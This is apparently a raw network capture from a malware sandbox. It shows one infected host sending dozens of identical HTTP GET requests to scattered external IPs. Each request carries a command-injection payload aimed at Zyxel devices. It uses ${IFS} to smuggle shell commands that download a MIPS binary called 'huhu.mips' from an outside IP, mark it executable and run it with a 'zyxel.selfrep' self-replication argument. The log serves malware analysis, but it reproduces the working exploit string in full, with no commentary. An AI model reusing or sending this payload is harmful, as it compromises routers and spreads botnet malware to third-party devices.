                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5715192.168.2.1545054199.244.53.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742991924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5716192.168.2.153475818.187.138.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743029118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5717192.168.2.155308065.90.95.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743073940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5718192.168.2.1549516200.137.222.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743088961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5719192.168.2.154983446.106.244.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743146896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5720192.168.2.1556270105.52.250.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743185043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5721192.168.2.153400046.148.157.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743226051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5722192.168.2.1554172103.220.205.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5723192.168.2.1546842135.42.48.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743308067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5724192.168.2.153824219.5.163.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743346930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5725192.168.2.1559506160.143.188.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743387938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5726192.168.2.1541372194.229.241.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743442059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5727192.168.2.1542534223.109.83.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743479013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5728192.168.2.1555846144.234.26.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743505955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5729192.168.2.1539490120.105.4.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743541956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5730192.168.2.1534564119.32.192.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743592978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5731192.168.2.1535286102.153.16.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743652105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5732192.168.2.153295419.249.93.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743704081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5733192.168.2.1546904126.151.76.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743746996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5734192.168.2.1551328159.106.176.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743779898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5735192.168.2.155813894.72.98.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743819952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5736192.168.2.1545972175.127.187.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743843079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5737192.168.2.155292227.50.47.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743886948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5738192.168.2.1553270137.128.230.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743923903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5739192.168.2.154782858.25.21.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.743973970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5740192.168.2.1554590206.224.120.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744009972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5741192.168.2.154427674.219.227.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744056940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5742192.168.2.153962466.242.123.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744091034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5743192.168.2.156003293.235.68.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744136095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5744192.168.2.153709063.88.27.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744190931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5745192.168.2.1554756189.93.10.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744230986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5746192.168.2.1543398158.238.161.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744267941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5747192.168.2.1539944156.237.93.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744307041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5748192.168.2.1552636128.142.226.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744354010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5749192.168.2.154940250.12.161.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744400978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5750192.168.2.1553362181.7.113.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744425058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5751192.168.2.1550152195.133.181.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744452953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5752192.168.2.1547628160.186.108.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744492054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5753192.168.2.1542642220.183.89.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744543076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5754192.168.2.1554092199.148.105.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744568110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5755192.168.2.1541414199.247.102.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744626045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5756192.168.2.155824435.192.45.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744652987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5757192.168.2.1557464192.80.125.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744707108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5758192.168.2.154832662.222.215.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744729996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5759192.168.2.1535602113.179.128.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744786978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5760192.168.2.1532916213.209.139.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744817019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5761192.168.2.155321663.189.218.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744846106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5762192.168.2.155733650.26.79.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744905949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5763192.168.2.153692858.202.149.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744916916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5764192.168.2.1534862117.234.3.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.744973898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5765192.168.2.15331605.81.87.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745013952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5766192.168.2.1538416119.174.83.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745050907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5767192.168.2.1539476220.68.230.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745116949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5768192.168.2.154319684.173.22.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745147943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5769192.168.2.15491262.140.112.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745196104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5770192.168.2.154268039.19.104.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745232105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5771192.168.2.1553118191.232.197.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745268106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5772192.168.2.1556702169.222.229.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745312929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5773192.168.2.154337031.219.222.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745346069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5774192.168.2.1549866188.140.236.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745378971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5775192.168.2.1556404218.225.36.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745426893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5776192.168.2.155041449.96.46.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745449066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5777192.168.2.1559114185.174.137.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745485067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5778192.168.2.154250877.223.102.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745526075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5779192.168.2.1542036106.28.116.220443
